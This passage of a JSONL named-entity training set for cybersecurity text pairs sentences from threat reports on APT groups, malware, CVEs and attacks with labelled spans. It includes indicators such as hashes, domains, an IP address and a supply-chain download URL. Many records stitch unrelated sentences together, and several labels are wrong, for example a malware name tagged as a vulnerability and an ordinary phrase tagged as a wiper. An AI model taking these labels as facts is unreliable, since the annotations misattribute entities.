Chitpas is heavily involved with Thailand politics and was a core leader of the People 's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 .", "spans": {"TOOL: SHAPESHIFT wiper": [[4, 20]], "ORGANIZATION: politics": [[132, 140]], "ORGANIZATION: People 's Committee for Absolute Democracy": [[170, 212]], "ORGANIZATION: PCAD": [[215, 219]]}, "info": {"id": "cyberner_stix_train_007581", "source": "cyberner_stix_train"}} {"text": "The new payload is decrypted , remapped , and executed in memory , and represents the installation and persistence stage of the malware . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . To encode a byte of the payload , the first three bits ( 0-2 ) are stored in the red color , the next three bits ( 3-5 ) are stored in the green color , and the final two bits ( 6-7 ) are stored in the blue color . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"TOOL: POWRUNER": [[138, 146]], "MALWARE: RTF file": [[179, 187]], "VULNERABILITY: CVE-2017-0199": [[203, 216]], "VULNERABILITY: server - side request forgery ( SSRF )": [[475, 513]]}, "info": {"id": "cyberner_stix_train_007582", "source": "cyberner_stix_train"}} {"text": "HummingBad attempted to override security protections by exploiting unpatched vulnerabilities that gave the malware root privileges in older versions of Android . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) . This protection successfully protected the targeted organization from being compromised . 
Prior to Citrix ’s publication and our development of a PoC , we believed the session takeovers were the result of zero - day exploitation of an unknown vulnerability .", "spans": {"MALWARE: HummingBad": [[0, 10]], "VULNERABILITY: unpatched vulnerabilities": [[68, 93]], "SYSTEM: Android": [[153, 160]], "TOOL: KiloAlfa": [[196, 204]], "VULNERABILITY: zero - day exploitation": [[505, 528]]}, "info": {"id": "cyberner_stix_train_007583", "source": "cyberner_stix_train"}} {"text": "In the example server response below , the green fields show text to be shown to the user . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . It then adds the “ Loveusd.sys ” extracted driver name to the upper filter list . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"TOOL: legitimate software": [[276, 295]], "FILEPATH: Loveusd.sys": [[317, 328]], "SYSTEM: Remote PowerShell service": [[447, 472]]}, "info": {"id": "cyberner_stix_train_007584", "source": "cyberner_stix_train"}} {"text": "China seems to a mass victim of this kind of malware having a 92 % share . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . PLA Unit 61398 is also located in precisely the same area from which APT1 activity appears to originate . 
The web page “ JavaApplet.html ” loads “ JavaApplet.class ” that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": {"TOOL: Java related application": [[111, 135]], "MALWARE: Java file": [[223, 232]], "ORGANIZATION: PLA": [[235, 238]], "ORGANIZATION: Unit 61398": [[239, 249]], "THREAT_ACTOR: APT1": [[304, 308]], "VULNERABILITY: CVE-2013 - 0422": [[474, 489]]}, "info": {"id": "cyberner_stix_train_007585", "source": "cyberner_stix_train"}} {"text": "These persistence components appear to be uniquely customized for use with GeminiDuke , but they use many of the same techniques as CosmicDuke persistence components .", "spans": {"MALWARE: GeminiDuke": [[75, 85]], "MALWARE: CosmicDuke": [[132, 142]]}, "info": {"id": "cyberner_stix_train_007586", "source": "cyberner_stix_train"}} {"text": "These “ extended-capability ”", "spans": {}, "info": {"id": "cyberner_stix_train_007587", "source": "cyberner_stix_train"}} {"text": "The nature of the Suckfly attacks suggests that it is unlikely that the threat group orchestrated these attacks on their own .", "spans": {"THREAT_ACTOR: Suckfly": [[18, 25]]}, "info": {"id": "cyberner_stix_train_007588", "source": "cyberner_stix_train"}} {"text": "Running the strings utility against the dumped ACLIENT.EXE binary revealed evidence that the file was the Altiris agent .", "spans": {"FILEPATH: ACLIENT.EXE": [[47, 58]], "TOOL: Altiris": [[106, 113]]}, "info": {"id": "cyberner_stix_train_007589", "source": "cyberner_stix_train"}} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . 
All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection .", "spans": {"MALWARE: malicious documents": [[4, 23]], "ORGANIZATION: Pakistan Army": [[126, 139]], "TOOL: C2": [[289, 291]]}, "info": {"id": "cyberner_stix_train_007590", "source": "cyberner_stix_train"}} {"text": "Another interesting feature in FakeSpy ’ s code is the collection of the device 's IMEI ( International Mobile Station Equipment Identity ) number and all installed applications using the function upAppinfos . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download .", "spans": {"MALWARE: FakeSpy": [[31, 38]], "THREAT_ACTOR: It": [[210, 212]], "THREAT_ACTOR: Ke3chang": [[348, 356]], "THREAT_ACTOR: attackers": [[357, 366]], "TOOL: emails": [[392, 398]]}, "info": {"id": "cyberner_stix_train_007591", "source": "cyberner_stix_train"}} {"text": "The CrowdStrike Intelligence team has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . 
Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[4, 28]], "THREAT_ACTOR: PUTTER PANDA": [[105, 117]], "ORGANIZATION: ESET": [[189, 193]], "MALWARE: Potao": [[207, 212]], "ORGANIZATION: government": [[275, 285]], "ORGANIZATION: military entities": [[290, 307]], "ORGANIZATION: news agencies": [[339, 352]]}, "info": {"id": "cyberner_stix_train_007592", "source": "cyberner_stix_train"}} {"text": "A company involved in the design and manufacture of motor vehicles .", "spans": {"ORGANIZATION: A company involved in the design and manufacture of motor vehicles": [[0, 66]]}, "info": {"id": "cyberner_stix_train_007593", "source": "cyberner_stix_train"}} {"text": "The number continues to rise at an additional 13,000 breached devices each day . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . optinsn_t for defeating opaque predicates ( defined as ObfCompilerOptimizer ) Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"THREAT_ACTOR: APT37": [[81, 86]], "THREAT_ACTOR: state-sponsored group": [[110, 131]], "ORGANIZATION: financial company": [[160, 177]], "TOOL: optinsn_t": [[227, 236]], "TOOL: ObfCompilerOptimizer": [[282, 302]], "ORGANIZATION: Talos": [[428, 433]], "ORGANIZATION: Open Babel": [[499, 509]]}, "info": {"id": "cyberner_stix_train_007594", "source": "cyberner_stix_train"}} {"text": "Again , the concept is that new victims are more likely to install the malware if the SMS comes from someone they know . 
Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis . OceanLotus : manongrover.com 7244 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": {"THREAT_ACTOR: threat actor": [[145, 157]], "THREAT_ACTOR: OceanLotus": [[445, 455]], "DOMAIN: manongrover.com": [[458, 473]], "THREAT_ACTOR: LockBit": [[512, 519]]}, "info": {"id": "cyberner_stix_train_007595", "source": "cyberner_stix_train"}} {"text": "TA542 , the primary actor behind Emotet , is known for the development of lures and malicious mail specific to given regions . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched .", "spans": {"THREAT_ACTOR: TA542": [[0, 5]], "TOOL: Emotet": [[33, 39]], "MALWARE: Magnitude EK": [[131, 143]], "VULNERABILITY: CVE-2016-0189": [[170, 183]], "ORGANIZATION: FireEye": [[214, 221]], "MALWARE: Neutrino Exploit Kit": [[239, 259]]}, "info": {"id": "cyberner_stix_train_007596", "source": "cyberner_stix_train"}} {"text": "Unit 42 believes this group is previously unidentified and therefore have we have dubbed it \" RANCOR \" . 
The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: group": [[22, 27]], "THREAT_ACTOR: RANCOR": [[94, 100]], "FILEPATH: tool": [[109, 113]]}, "info": {"id": "cyberner_stix_train_007597", "source": "cyberner_stix_train"}} {"text": "HIDDEN COBRA actors commonly target systems running older , unsupported versions of Microsoft operating systems .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[0, 12]], "ORGANIZATION: Microsoft": [[84, 93]]}, "info": {"id": "cyberner_stix_train_007598", "source": "cyberner_stix_train"}} {"text": "Perkele and Wroba Foreign users have also been on the receiving end of several malicious innovations targeting bank accounts . For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims . ZxShell has been around since 2004 . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": {"MALWARE: Perkele": [[0, 7]], "MALWARE: Wroba": [[12, 17]], "THREAT_ACTOR: Turla": [[139, 144]], "TOOL: fake Flash installers": [[190, 211]], "MALWARE: ZxShell": [[236, 243]]}, "info": {"id": "cyberner_stix_train_007599", "source": "cyberner_stix_train"}} {"text": "This sample displayed ads from various sources . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China . The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads . 
If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": {"ORGANIZATION: Unit 42": [[49, 56]], "ORGANIZATION: Foreign Ministry": [[133, 149]], "SYSTEM: Exchange Server": [[324, 339]]}, "info": {"id": "cyberner_stix_train_007600", "source": "cyberner_stix_train"}} {"text": "Data acquired from mike.jar 's extraction modules is normally XORed and stored in a folder named .lost+found on the SD card . Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly . Announcement about a new regulation regarding internet usage in Palestinian government institutions . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": {"ORGANIZATION: Palestinian government": [[323, 345]], "THREAT_ACTOR: Cl0p": [[363, 367]]}, "info": {"id": "cyberner_stix_train_007601", "source": "cyberner_stix_train"}} {"text": "\" BLU said they had no security department when I emailed them . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . HomamDownloader : a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 .", "spans": {"ORGANIZATION: BLU": [[2, 5]], "MALWARE: ITW": [[97, 100]], "MALWARE: RTF": [[260, 263]], "MALWARE: HomamDownloader": [[291, 306]], "FILEPATH: a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7": [[309, 373]]}, "info": {"id": "cyberner_stix_train_007602", "source": "cyberner_stix_train"}} {"text": "SMS . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . 
Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors .", "spans": {"MALWARE: Catchamas": [[6, 15]], "THREAT_ACTOR: Leafminer": [[154, 163]], "THREAT_ACTOR: actors": [[296, 302]]}, "info": {"id": "cyberner_stix_train_007603", "source": "cyberner_stix_train"}} {"text": "The library is an older version of the “ DWN_DLL_MAIN.dll ” ( md5: ce8b99df8642c065b6af43fde1f786a3 ) .", "spans": {"FILEPATH: DWN_DLL_MAIN.dll": [[41, 57]], "FILEPATH: ce8b99df8642c065b6af43fde1f786a3": [[67, 99]]}, "info": {"id": "cyberner_stix_train_007604", "source": "cyberner_stix_train"}} {"text": "1.6 1.9 Myanmar 234,338 9,729,572 1.5 1.4 1.9 “ Agent Smith ” Timeline Early signs of activity from the actor behind “ Agent Smith ” can be traced back to January 2016 . Periodically , the malware tries to contact the Command-and-Control ( C&C ) server with the username encoded into parameters . After a few months of monitoring , we were able to identify around 200 unique Dexphot domains . Per Microsoft ’s blog , they have identified additional post - exploitation activities , including : • Compression of data for exfiltration via 7 - Zip . • Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": {"MALWARE: Agent Smith": [[48, 59]], "TOOL: Command-and-Control": [[218, 237]], "MALWARE: Dexphot": [[375, 382]], "ORGANIZATION: Microsoft ’s": [[397, 409]]}, "info": {"id": "cyberner_stix_train_007605", "source": "cyberner_stix_train"}} {"text": "What made this particular case interesting was that instead of the usual dull PDF file , the decoy was a Flash video file , more specifically a Super Bowl advertisement from 2007 purporting to show monkeys at an office .", "spans": {"TOOL: PDF": [[78, 81]], "TOOL: Flash": [[105, 110]]}, "info": {"id": "cyberner_stix_train_007606", "source": "cyberner_stix_train"}} {"text": "] net adminsysteminfo [ . 
Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY .", "spans": {"THREAT_ACTOR: APT41": [[145, 150]], "ORGANIZATION: Mandiant": [[240, 248]], "THREAT_ACTOR: APT29": [[262, 267]], "MALWARE: POSHSPY": [[307, 314]]}, "info": {"id": "cyberner_stix_train_007607", "source": "cyberner_stix_train"}} {"text": "What Does SimBad Do ? If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Suckfly conducted a multistage attack against an e-commerce organization based in India .", "spans": {"MALWARE: SimBad": [[10, 16]], "VULNERABILITY: Carbanak": [[54, 62]], "VULNERABILITY: CVE-2013-3660": [[231, 244]], "ORGANIZATION: e-commerce organization": [[329, 352]]}, "info": {"id": "cyberner_stix_train_007608", "source": "cyberner_stix_train"}} {"text": "These apps appear legitimate due to their app logo , UI appearance , and redirects to the carrier webpage -- all luring end users to believe it ’ s the original one . Xpert RAT reportedly first appeared in 2011 . 
cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": {"MALWARE: Xpert RAT": [[167, 176]], "THREAT_ACTOR: cyber actors": [[213, 225]], "ORGANIZATION: media": [[260, 265]], "ORGANIZATION: aerospace": [[268, 277]], "ORGANIZATION: financial": [[280, 289]], "ORGANIZATION: critical infrastructure sectors": [[296, 327]]}, "info": {"id": "cyberner_stix_train_007609", "source": "cyberner_stix_train"}} {"text": "The CozyDuke activity continues one of the long-running trends of the Dukes operations , the use of multiple malware toolsets against a single target .", "spans": {"MALWARE: CozyDuke": [[4, 12]], "THREAT_ACTOR: Dukes": [[70, 75]]}, "info": {"id": "cyberner_stix_train_007610", "source": "cyberner_stix_train"}} {"text": "Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . 
The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware .", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "ORGANIZATION: governmental": [[37, 49]], "ORGANIZATION: embassies": [[90, 99]], "ORGANIZATION: aerospace": [[121, 130]], "ORGANIZATION: defence Industries": [[135, 153]], "ORGANIZATION: financial institutions": [[156, 178]], "ORGANIZATION: journalists": [[181, 192]], "ORGANIZATION: software developers": [[195, 214]], "FILEPATH: malware": [[221, 228]]}, "info": {"id": "cyberner_stix_train_007611", "source": "cyberner_stix_train"}} {"text": "Furthermore , Dragos ’ analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": {"ORGANIZATION: Dragos": [[14, 20]], "MALWARE: TRISIS": [[39, 45]]}, "info": {"id": "cyberner_stix_train_007612", "source": "cyberner_stix_train"}} {"text": "The campaign appeared to consist of two distinct waves of spear-phishing , one during the first days of July and the other starting from the 20th of the month .", "spans": {}, "info": {"id": "cyberner_stix_train_007613", "source": "cyberner_stix_train"}} {"text": "In order to upload the file , the app uses a basic REST communication with the server , checking if the file exists and uploading it if it isn ’ t . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent . 
The chain of evidence suggests that the threat actor ’s motives are financially driven .", "spans": {"THREAT_ACTOR: APT33": [[179, 184]], "MALWARE: malicious file": [[251, 265]], "ORGANIZATION: Kaspersky Lab": [[320, 333]], "FILEPATH: Trojan.Win32.Remexi": [[390, 409]], "FILEPATH: Trojan.Win32.Agent": [[414, 432]]}, "info": {"id": "cyberner_stix_train_007615", "source": "cyberner_stix_train"}} {"text": "In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER” identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"ORGANIZATION: FireEye": [[15, 22]], "MALWARE: ATM malware": [[46, 57]], "MALWARE: RIPPER": [[78, 84]], "ORGANIZATION: banks": [[258, 263]], "THREAT_ACTOR: Turla": [[285, 290]], "TOOL: emails": [[359, 365]], "ORGANIZATION: German Foreign Office staff": [[378, 405]]}, "info": {"id": "cyberner_stix_train_007616", "source": "cyberner_stix_train"}} {"text": "The infection has not spread very widely at the time of writing , but we ’ ve seen that many users have already received its SMS content . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials . A Glimpse into Glimpse For the second blog post in our series, the IronNet Threat Research Team examines the Glimpse malware that is written in PowerShell and has been associated with OilRig S-APT/APT34 . 
Instead , it ’s likely that Royal is simply testing a new encryptor — especially considering that BlackSuit was used in just two attacks last month — and that this lull can be explained as more or less of a research period for them .", "spans": {"THREAT_ACTOR: admin@338": [[143, 152]], "TOOL: Poison Ivy RAT": [[170, 184]], "TOOL: WinHTTPHelper malware": [[189, 210]], "ORGANIZATION: government officials": [[242, 262]], "THREAT_ACTOR: Glimpse": [[280, 287]], "ORGANIZATION: IronNet Threat Research Team": [[332, 360]], "MALWARE: Glimpse": [[374, 381]], "TOOL: PowerShell": [[409, 419]], "THREAT_ACTOR: OilRig S-APT/APT34": [[449, 467]], "MALWARE: Royal": [[498, 503]], "TOOL: new encryptor": [[524, 537]], "MALWARE: BlackSuit": [[568, 577]]}, "info": {"id": "cyberner_stix_train_007617", "source": "cyberner_stix_train"}} {"text": "Downeks.NET is obfuscated using “ Yano ” and can be easily de-obfuscated using the de4dot utility .", "spans": {"MALWARE: Downeks.NET": [[0, 11]], "TOOL: Yano": [[34, 38]], "TOOL: the de4dot utility": [[79, 97]]}, "info": {"id": "cyberner_stix_train_007618", "source": "cyberner_stix_train"}} {"text": "Due to TG-3390 's determination , organizations should formulate a solid eviction plan before engaging with the threat actors to prevent them from reentering the network .", "spans": {"THREAT_ACTOR: TG-3390": [[7, 14]]}, "info": {"id": "cyberner_stix_train_007619", "source": "cyberner_stix_train"}} {"text": "During our investigation of TEMP.Veles activity , we found multiple unique tools that the group deployed in the target environment .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[28, 38]]}, "info": {"id": "cyberner_stix_train_007620", "source": "cyberner_stix_train"}} {"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au.su Homevideo2-12l.ml videohosting1-5j.gq URLs hxxp : //88.99.227 [ . 
Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) . It beacons to domain connect.bafunpda.xyz and attempts to connect to TCP port 4433 . They once attacked a game server to illicitly farm in - game currency ( “ gaming gold ” , which also has real - world value ) and stole source codes of online game projects .", "spans": {"TOOL: MuddyWater-associated samples": [[173, 202]], "TOOL: PowerShell commands": [[287, 306]], "THREAT_ACTOR: actor": [[378, 383]], "DOMAIN: connect.bafunpda.xyz": [[437, 457]]}, "info": {"id": "cyberner_stix_train_007621", "source": "cyberner_stix_train"}} {"text": "This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server .", "spans": {"MALWARE: Zebrocy": [[25, 32]], "TOOL: JPEG": [[85, 89]], "TOOL: C2": [[103, 105]]}, "info": {"id": "cyberner_stix_train_007622", "source": "cyberner_stix_train"}} {"text": "e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614 .", "spans": {"FILEPATH: e8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614": [[0, 64]]}, "info": {"id": "cyberner_stix_train_007623", "source": "cyberner_stix_train"}} {"text": "Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . 
Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": {"THREAT_ACTOR: espionage": [[67, 76]], "ORGANIZATION: economic": [[81, 89]], "THREAT_ACTOR: activity groups": [[116, 131]], "ORGANIZATION: specific individuals": [[165, 185]], "ORGANIZATION: Dragos": [[188, 194]], "MALWARE: ICS vendors and manufacturers": [[229, 258]], "THREAT_ACTOR: XENOTIME": [[295, 303]], "MALWARE: ICS networks": [[414, 426]]}, "info": {"id": "cyberner_stix_train_007624", "source": "cyberner_stix_train"}} {"text": "The longer a Trojan “ lives ” on a smartphone , the more money it will make for the owner . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data . The decompiled function responsible for patching the parent process . In fact , they often drive one another to complete more complicated hacks .", "spans": {"ORGANIZATION: Dell SecureWorks": [[92, 108]], "THREAT_ACTOR: Group-3390": [[149, 159]]}, "info": {"id": "cyberner_stix_train_007625", "source": "cyberner_stix_train"}} {"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface . and as discovered later , even the U.S. and UK governments . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip . 
Because phishing often leverages the impersonation of trusted associates from highlevel executives to legitimate vendors and partner organizations and includes personal details skimmed from social media or other publicly available information , its tempting to call them sophisticated .", "spans": {"SYSTEM: Android": [[4, 11]], "ORGANIZATION: governments": [[256, 267]], "THREAT_ACTOR: ShadowHammer": [[270, 282]], "URL: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip": [[285, 379]]}, "info": {"id": "cyberner_stix_train_007626", "source": "cyberner_stix_train"}} {"text": "Security experts have long warned of the ability of advanced adversaries to subvert hardware and software supply chains . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe . The group has conducted activity on hotel and business center Wi‑Fi and physical connections as well as peer-to-peer and file sharing networks .", "spans": {"MALWARE: SPK KANUN": [[139, 148]], "MALWARE: CiscoAny.exe": [[273, 285]]}, "info": {"id": "cyberner_stix_train_007627", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa.com .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "URL: ntg-sa.com": [[114, 124]]}, "info": {"id": "cyberner_stix_train_007628", "source": "cyberner_stix_train"}} {"text": "This section describes some of the tools used by the group . 
In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: group": [[53, 58]], "VULNERABILITY: exploit": [[119, 126]], "VULNERABILITY: CVE-2012-0158": [[127, 140]], "MALWARE: NetTraveler Trojan": [[156, 174]]}, "info": {"id": "cyberner_stix_train_007629", "source": "cyberner_stix_train"}} {"text": "At least three of the messages were intended to check a user ’ s account balance at the institution ( we could not confirm the purpose of the fourth ) .Through additional research , we identified several forum posts where victims complained of funds ( up to 600 rubles ) were transferred out of their accounts after RuMMS infected their phones . Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia . Threat : Gamaredon Pteranodon implant SFX archive . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named “ Solar Polygon ” ( Figure 2 ) .", "spans": {"MALWARE: RuMMS": [[316, 321]], "ORGANIZATION: Kaspersky": [[346, 355]], "THREAT_ACTOR: BlackOasis": [[379, 389]], "THREAT_ACTOR: Gamaredon": [[445, 454]], "MALWARE: Pteranodon": [[455, 465]], "TOOL: SFX archive": [[474, 485]], "MALWARE: COSMICENERGY": [[488, 500], [627, 639]], "ORGANIZATION: Russian Government": [[526, 544]]}, "info": {"id": "cyberner_stix_train_007630", "source": "cyberner_stix_train"}} {"text": "Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . 
Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media .", "spans": {"MALWARE: TRITON/TRISIS": [[278, 291]], "ORGANIZATION: Dragos": [[362, 368]], "ORGANIZATION: FireEye": [[453, 460]], "ORGANIZATION: media": [[520, 525]]}, "info": {"id": "cyberner_stix_train_007631", "source": "cyberner_stix_train"}} {"text": "Tools and capabilities used by HIDDEN COBRA actors include DDoS botnet S-ACTs , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[31, 43]], "TOOL: DDoS botnet S-ACTs": [[59, 77]], "TOOL: keyloggers": [[80, 90]], "TOOL: remote access tools": [[93, 112]], "TOOL: RATs": [[115, 119]], "MALWARE: wiper": [[128, 133]]}, "info": {"id": "cyberner_stix_train_007632", "source": "cyberner_stix_train"}} {"text": "Running Volatility 's vaddump plugin on this process allowed CTU researchers to obtain the Virtual Address Descriptor ( VAD ) sections .", "spans": {"TOOL: Volatility": [[8, 18]], "TOOL: vaddump": [[22, 29]], "TOOL: plugin": [[30, 36]], "ORGANIZATION: CTU": [[61, 64]], "TOOL: Virtual Address Descriptor": [[91, 117]], "TOOL: VAD": [[120, 123]]}, "info": {"id": "cyberner_stix_train_007633", "source": "cyberner_stix_train"}} {"text": "Symantec discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware . 
Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence’s Trojan , known as Silence.MainModule .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Suckfly": [[20, 27]], "TOOL: hacktools": [[133, 142]], "ORGANIZATION: Group-IB": [[164, 172]], "THREAT_ACTOR: Silence’s": [[275, 284]], "MALWARE: Trojan": [[285, 291]], "MALWARE: Silence.MainModule": [[303, 321]]}, "info": {"id": "cyberner_stix_train_007634", "source": "cyberner_stix_train"}} {"text": "In some cases , malicious components are dynamically downloaded onto a device after an infected app is installed . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . APT33 : 64.251.19.216 [REDACTED].myftp.org . Notably , there were no overlaps in infrastructure between these clusters of activity .", "spans": {"TOOL: WannaCry": [[115, 123]], "VULNERABILITY: EternalBlue": [[159, 170]], "THREAT_ACTOR: Shadow Brokers": [[200, 214]], "THREAT_ACTOR: APT33": [[236, 241]], "IP_ADDRESS: 64.251.19.216": [[244, 257]], "DOMAIN: [REDACTED].myftp.org": [[258, 278]]}, "info": {"id": "cyberner_stix_train_007635", "source": "cyberner_stix_train"}} {"text": "The primary goal of sux appears to be steal messages and other data from popular messaging and social media apps specified within the HenBox sample . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . 
Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"MALWARE: HenBox": [[134, 140]], "THREAT_ACTOR: APT41": [[157, 162], [326, 331]], "THREAT_ACTOR: Sofacy": [[382, 388]], "MALWARE: backdoors": [[409, 418]], "MALWARE: USB stealers": [[421, 433]], "MALWARE: Mimikatz": [[475, 483]]}, "info": {"id": "cyberner_stix_train_007636", "source": "cyberner_stix_train"}} {"text": "Infrastructure While investigating HenBox we discovered infrastructure ties to other malware families associated with targeted attacks against Windows users – notable overlaps included PlugX , Zupdax , 9002 , and Poison Ivy . We observed APT41 using a compromised account to create a scheduled task on a system , write a binary component of HIGHNOON containing the payload and C&C information to disk , and then modify the legitimate Windows WMI Performance Adaptor (wmiApSrv) to execute the HIGHNOON payload . 
